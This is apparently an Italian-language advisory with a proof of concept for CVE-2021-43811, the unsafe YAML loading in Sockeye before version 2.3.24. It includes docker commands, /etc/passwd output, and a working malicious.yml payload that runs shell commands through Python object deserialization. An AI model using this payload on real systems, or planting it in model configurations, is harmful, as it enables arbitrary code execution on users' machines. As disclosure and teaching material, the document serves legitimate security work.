
awslabs/sockeye Iniezione di codice tramite caricamento non sicuro di YAML CVE-2021-43811
awslabs/sockeye Iniezione di codice tramite caricamento non sicuro di YAML CVE-2021-43811
Sockeye è un framework open-source sequence-to-sequence per la traduzione automatica neurale basato su PyTorch. Sockeye utilizza YAML per memorizzare su disco le configurazioni di modelli e dati. Le versioni precedenti alla 2.3.24 utilizzano un caricamento non sicuro di YAML, che può essere indotto a eseguire codice arbitrario incorporato nei file di configurazione. Un attaccante può aggiungere codice dannoso al file di configurazione di un modello addestrato e tentare di convincere gli utenti a scaricarlo ed eseguirlo. Se gli utenti eseguono il modello, il codice incorporato verrà eseguito localmente. Il problema è stato risolto nella versione 2.3.24.

docker build -t cve-2021-43811 .
docker run -it --rm cve-2021-43811
output di /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
-- snip --

malicious.yml
!!python/object/new:type
args: ['z', !!python/tuple [], {'extend': !!python/name:exec }]
listitems: "__import__('os').system('cat /etc/passwd')"